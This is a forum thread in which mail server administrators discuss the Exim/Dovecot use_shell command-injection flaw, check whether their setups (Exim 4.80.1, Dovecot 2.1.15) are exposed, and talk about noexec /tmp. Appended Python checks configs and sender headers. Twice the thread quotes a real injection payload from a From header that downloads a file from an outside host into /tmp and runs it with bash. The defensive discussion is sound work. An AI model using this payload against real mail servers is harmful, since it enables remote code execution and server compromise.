use_shell is insecure

Hello,

Is there a proof link for the issue you are referring to?

By the way, the link you gave says "This documentation is for Dovecot v1.x", so are you sure the issue is actual for Dovecot 2.x?
 
I can't seem to find where the Dovecot transport is called (at least not in exim.conf or dovecot.conf). Where can I disable use_shell, just to be sure?
 
I've already seen multiple tries on our servers trying to abuse the flaw.
But I am unsure if they were successful.
I can't seem to find anything suspicious in the /tmp folder or anything else suspicious in the processlist.

An example mail I have seen passing by:
Date: Sun, 5 May 2013 00:09:38 +0200 (CEST)
From: red`wget${IFS}-O${IFS}/tmp/p${IFS}it-haz.hu/ex.txt``bash${IFS}/tmp/p`team@example.com

Running
Exim 4.80.1
dovecot: 2.1.15
 
The use_shell parameter is not located in my config files. I assume we are safe as the default value of this setting is "false"?
 
I checked the wget file; it needs /tmp, but when the security setting is set, /tmp is mounted with noexec as normal, so the perl can't exec the backdoor file.

or ?
 
From: red`wget${IFS}-O${IFS}/tmp/p${IFS}it-haz.hu/ex.txt``bash${IFS}/tmp/p`team@example.com
I also got mail attempts like this, addressed to the postmaster email address.
We also got the /tmp secured.

It should be under the transport configuration "dovecot_deliver:", somewhere near this line:
/usr/libexec/dovecot/deliver
or
/usr/lib/dovecot/deliver
However, until now I haven't found this or the use_shell line.

Maybe DA support can tell us more?
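As an added example (not code from any poster in this thread), a small Python check for the two questions raised above: whether any pipe transport in an Exim configuration turns on use_shell (Exim's default is false), and whether a sender header carries the kind of shell syntax seen in the attempts. The configuration text and the From value are constructed samples; the host in the sample address is a placeholder.

```python
import re

# Constructed sample: an Exim transports section with one unsafe and one safe
# Dovecot LDA transport (the deliver paths are the ones mentioned in the thread).
SAMPLE_EXIM_CONF = """
begin transports

dovecot_deliver:
  driver = pipe
  command = /usr/lib/dovecot/deliver -d $local_part@$domain
  use_shell
  log_output

dovecot_lda_safe:
  driver = pipe
  command = /usr/libexec/dovecot/deliver -d $local_part@$domain
  no_use_shell
"""

# Constructed sample header, modelled on the attempt quoted in the thread but
# with a placeholder host (evil.example) instead of the real one.
SAMPLE_FROM = "red`wget${IFS}-O${IFS}/tmp/p${IFS}evil.example/x``bash${IFS}/tmp/p`team@example.com"

# Backticks, $(...), ${...}, pipes and semicolons in a sender address only make
# sense as shell syntax; a legitimate local part never contains them.
SHELL_META = re.compile(r"`|\$\(|\$\{|\||;")


def sender_has_shell_syntax(header_value: str) -> bool:
    """True when a From:/Return-Path value carries shell metacharacters."""
    return bool(SHELL_META.search(header_value))


def transports_using_shell(config_text: str) -> list[str]:
    """Names of transports where use_shell is enabled. A transport with no
    use_shell line is not reported (Exim default is false). Handles the bare
    option, 'use_shell = true/yes', and the negated 'no_use_shell' form."""
    current, flagged = None, []
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        m = re.fullmatch(r"(\w+):", line)      # 'name:' starts a transport
        if m:
            current = m.group(1)
            continue
        if current is None:
            continue
        key, _, val = (p.strip() for p in line.partition("="))
        if key == "use_shell" and (val == "" or val.lower() in ("true", "yes")):
            flagged.append(current)
        elif key in ("no_use_shell", "not_use_shell") and current in flagged:
            flagged.remove(current)
    return flagged
```

Run transports_using_shell over the real exim.conf to answer "is use_shell on anywhere", and sender_has_shell_syntax over From/Return-Path values from the mail log to spot attempts like the one quoted.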
 